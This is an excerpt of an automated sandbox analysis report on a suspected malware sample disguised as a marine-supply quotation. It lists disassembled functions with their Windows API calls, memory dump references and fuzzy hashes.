                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                            • String ID:
                                                                            • API String ID: 4136290138-0
                                                                            • Opcode ID: 7f94cf4dee8f6ecdcc5f0d734e2de95ef48e120867888bdce947c69015a6a6d9
                                                                            • Instruction ID: 5d223ce974b986d366252a2ad83e59f381d1fbba38d94d91fa1c10cd5a590fa5
                                                                            • Opcode Fuzzy Hash: 7f94cf4dee8f6ecdcc5f0d734e2de95ef48e120867888bdce947c69015a6a6d9
                                                                            • Instruction Fuzzy Hash: 825137B5A00619EFCB14CF68C894EAAB7FAFF89314B158559E909DB350E730E911CF90
                                                                            Function 0066542E Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(00673CD6,?,?,?,?,?,?,?,?,00665BA3,?,?,00673CD6,?,?), ref: 00665470
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00673CD6,00000005,00000000,00000000), ref: 0066552C
                                                                            • WriteFile.KERNEL32(?,00673CD6,00000000,00665BA3,00000000,?,?,?,?,?,?,?,?,?,00665BA3,?), ref: 0066554B
                                                                            • WriteFile.KERNEL32(?,?,00000001,00665BA3,00000000,?,?,?,?,?,?,?,?,?,00665BA3,?), ref: 00665584
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                            • String ID:
                                                                            • API String ID: 977765425-0
                                                                            • Opcode ID: 50a0c581095cb575df0d23125b02ea1868adacdefcf7af8a8bb9ea551f9b6bd5
                                                                            • Instruction ID: dec3dd0436dcbab47e344bef4bfa9b47e8292357864890b547592ed99d1c1830
                                                                            • Opcode Fuzzy Hash: 50a0c581095cb575df0d23125b02ea1868adacdefcf7af8a8bb9ea551f9b6bd5
                                                                            • Instruction Fuzzy Hash: 4B51A3B1A006499FDB10CFA8D846AEEBBFAEF09310F14415EF556E7291D730AA41CB64
                                                                            Function 006A8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006A8BAE
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 006A8BDA
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006A8C32
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006A8C57
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006A8C5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                            • String ID:
                                                                            • API String ID: 2832842796-0
                                                                            • Opcode ID: 52d8282b83a4257cfe4969cb9c507653d2086a2cc9148428fd7adb51a92ccd96
                                                                            • Instruction ID: 0245341e486b5ace1d32e10aff3e61bd4b919025233954a6ee17012b0f185b5f
                                                                            • Opcode Fuzzy Hash: 52d8282b83a4257cfe4969cb9c507653d2086a2cc9148428fd7adb51a92ccd96
                                                                            • Instruction Fuzzy Hash: E3515E75A002189FCB14DF65C880E69BBF6FF49324F088458E84AAB362CB35ED51CF94
                                                                            Function 006B8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 006B8F40
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 006B8FD0
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 006B8FEC
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 006B9032
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 006B9052
                                                                              • Part of subcall function 0064F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,006A1043,?,7746E610), ref: 0064F6E6
                                                                              • Part of subcall function 0064F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0068FA64,00000000,00000000,?,?,006A1043,?,7746E610,?,0068FA64), ref: 0064F70D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                            • String ID:
                                                                            • API String ID: 666041331-0
                                                                            • Opcode ID: e640120a13c63dae7b4f6eeca3e963c193a2801ef79c4ed68f34a5715d635910
                                                                            • Instruction ID: 43f7e8b232f797251628c9c805de59b81290f9d28e7dceace772752dab938565
                                                                            • Opcode Fuzzy Hash: e640120a13c63dae7b4f6eeca3e963c193a2801ef79c4ed68f34a5715d635910
                                                                            • Instruction Fuzzy Hash: 78512975604205DFCB15EF58C4948EDBBB6FF49324F098098E90A9B362DB31ED86CB90
                                                                            Function 006C6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 006C6C33
                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 006C6C4A
                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 006C6C73
                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,006AAB79,00000000,00000000), ref: 006C6C98
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 006C6CC7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$MessageSendShow
                                                                            • String ID:
                                                                            • API String ID: 3688381893-0
                                                                            • Opcode ID: d02cb28e4bc5f31c413c7be98638068d48adab1c0c55a23afbffa8d398a99839
                                                                            • Instruction ID: f0c31a7fd8187a4e997a09489c2e7aa8da1a3b3ed3e9e86a81bc64be6529e2a3
                                                                            • Opcode Fuzzy Hash: d02cb28e4bc5f31c413c7be98638068d48adab1c0c55a23afbffa8d398a99839
                                                                            • Instruction Fuzzy Hash: 2E41CD35A00144AFDB24CF28CD58FF97BA6EB09360F15026CF899A73A0C771AD51CA88
                                                                            Function 0064912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00649141
                                                                            • ScreenToClient.USER32(00000000,?), ref: 0064915E
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00649183
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 0064919D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: 94957f42f7f93638e3c108de1052841855a297a43460a726fdea73f78550847b
                                                                            • Instruction ID: a7e732b04071d1bf399310b68df9aa65906e17c3d3131984bdac8e4a8af6e212
                                                                            • Opcode Fuzzy Hash: 94957f42f7f93638e3c108de1052841855a297a43460a726fdea73f78550847b
                                                                            • Instruction Fuzzy Hash: CC41407190851BBBDF15AF64C848BFEB776FB05324F244319E469A72D0C730A950CB61
                                                                            Function 006A3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetInputState.USER32 ref: 006A38CB
                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 006A3922
                                                                            • TranslateMessage.USER32(?), ref: 006A394B
                                                                            • DispatchMessageW.USER32(?), ref: 006A3955
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A3966
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                            • String ID:
                                                                            • API String ID: 2256411358-0
                                                                            • Opcode ID: dda37dc97425e5d1cfb4309fdb14238ad10a98fdda94e77d12b678774f815c93
                                                                            • Instruction ID: fc7d0ac2919993d502bdb233d3333dedf8a9ea9e51ad367dcccf10dbdcdb1ffb
                                                                            • Opcode Fuzzy Hash: dda37dc97425e5d1cfb4309fdb14238ad10a98fdda94e77d12b678774f815c93
                                                                            • Instruction Fuzzy Hash: FF31A370904351DEEB25EB249848BF777AAAB06304F44856DF456823E0F7B8AE85CF11
                                                                            Function 006ACF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,006AC21E,00000000), ref: 006ACF38
                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 006ACF6F
                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,006AC21E,00000000), ref: 006ACFB4
                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,006AC21E,00000000), ref: 006ACFC8
                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,006AC21E,00000000), ref: 006ACFF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                            • String ID:
                                                                            • API String ID: 3191363074-0
                                                                            • Opcode ID: a0effbe972854db9651d1db89b18e673b48cb67e98d3a88a9572f6d45efadf1a
                                                                            • Instruction ID: b68a0b769d520dc203b9f45645ec1de6fc5474f5eea19163d1989b6df4bb7c7f
                                                                            • Opcode Fuzzy Hash: a0effbe972854db9651d1db89b18e673b48cb67e98d3a88a9572f6d45efadf1a
                                                                            • Instruction Fuzzy Hash: F3314F71504205AFDB20EFA5C884DABBBFBEF15361B10442EF51AD2241DB30AE41DF60
                                                                            Function 00691901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00691915
                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 006919C1
                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 006919C9
                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 006919DA
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 006919E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: 03a3f63d28b53c5c87aad4503bb1726ccc31956fe4e18b35f8e4906effe1c9da
                                                                            • Instruction ID: 5268f71eacb100a5c850cafc7e2cf07ebb854715904fc3dfff94cec826d40ce3
                                                                            • Opcode Fuzzy Hash: 03a3f63d28b53c5c87aad4503bb1726ccc31956fe4e18b35f8e4906effe1c9da
                                                                            • Instruction Fuzzy Hash: 7731D67190021AEFDF00CFA8CD59AEE3BBAEB45325F104225F925AB2D1C7709D44DB90
                                                                            Function 006B0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 006B0951
                                                                            • GetForegroundWindow.USER32 ref: 006B0968
                                                                            • GetDC.USER32(00000000), ref: 006B09A4
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 006B09B0
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 006B09E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 792b9d31dbda99b4289880b531286bad34581d4df334dd6496a621f455945022
                                                                            • Instruction ID: 767d6ca29105ec2348b2932846bdbcac171dab2fae447952e68e5163c82e5017
                                                                            • Opcode Fuzzy Hash: 792b9d31dbda99b4289880b531286bad34581d4df334dd6496a621f455945022
                                                                            • Instruction Fuzzy Hash: 29218175600204AFD744EF65C984EAEBBEAEF49750F04906CF84A97752CB30AC44CF90
                                                                            Function 00649639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00649693
                                                                            • SelectObject.GDI32(?,00000000), ref: 006496A2
                                                                            • BeginPath.GDI32(?), ref: 006496B9
                                                                            • SelectObject.GDI32(?,00000000), ref: 006496E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: a42f21270608767684cb7116b453c3897a9e41bc4bcae027b6effcadb291d5a4
                                                                            • Instruction ID: f309db705f02ce14c8230dd9bd173f8316f3de062009189f2b3757dbb1b41911
                                                                            • Opcode Fuzzy Hash: a42f21270608767684cb7116b453c3897a9e41bc4bcae027b6effcadb291d5a4
                                                                            • Instruction Fuzzy Hash: 1D218330852345EFEF11DF25EC18BFA3B66BB51325F518315F414961B0D774A852CBA8
                                                                            Function 0069000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?,?,0069035E), ref: 0069002B
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690046
                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690054
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?), ref: 00690064
                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0068FF41,80070057,?,?), ref: 00690070
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3897988419-0
                                                                            • Opcode ID: 7133a15f13d627b2ca2f7183829f6e88408e4ac326cee3977c952b63d6fb2316
                                                                            • Instruction ID: 011180f0d0fb4457048e96366bd9f65a4d6f8e2b0973733e79ff877ae0aff129
                                                                            • Opcode Fuzzy Hash: 7133a15f13d627b2ca2f7183829f6e88408e4ac326cee3977c952b63d6fb2316
                                                                            • Instruction Fuzzy Hash: BA018B72601204BFEF108F68DC08FAA7EEFEB447A2F145124F909D2210E771DD408BA0
                                                                            Function 0069E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0069E997
                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0069E9A5
                                                                            • Sleep.KERNEL32(00000000), ref: 0069E9AD
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0069E9B7
                                                                            • Sleep.KERNEL32 ref: 0069E9F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: 002f45b503353e02cc39ff10d67b90c4ba890d50764d4988ebe80355a193b7c1
                                                                            • Instruction ID: b9db18ec70318393340d28f57f91668e7b0b47d1a80735129038e4efa18c2d9c
                                                                            • Opcode Fuzzy Hash: 002f45b503353e02cc39ff10d67b90c4ba890d50764d4988ebe80355a193b7c1
                                                                            • Instruction Fuzzy Hash: 71015331C01629DBCF00EBE5DC59AEDBB7AFB09320F050946E902B2641CB399A519BA1
                                                                            Function 006910F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00691114
                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691120
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 0069112F
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691136
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0069114D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            • Opcode ID: 1df8eee91f6150fc40dc3ada4f968a6976db100b0159aac90cfa9ab69b6834be
                                                                            • Instruction ID: 16df76b6714102c32dc4c128aaec55c5c231e5ffc552878e929b0c7f9933547b
                                                                            • Opcode Fuzzy Hash: 1df8eee91f6150fc40dc3ada4f968a6976db100b0159aac90cfa9ab69b6834be
                                                                            • Instruction Fuzzy Hash: 90011975200205BFDB114FA5DC4DEAA3B6FEF8A3A0B244419FA49D7360DB31DC019A60
                                                                            Function 00690FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00690FCA
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00690FD6
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00690FE5
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00690FEC
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00691002
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
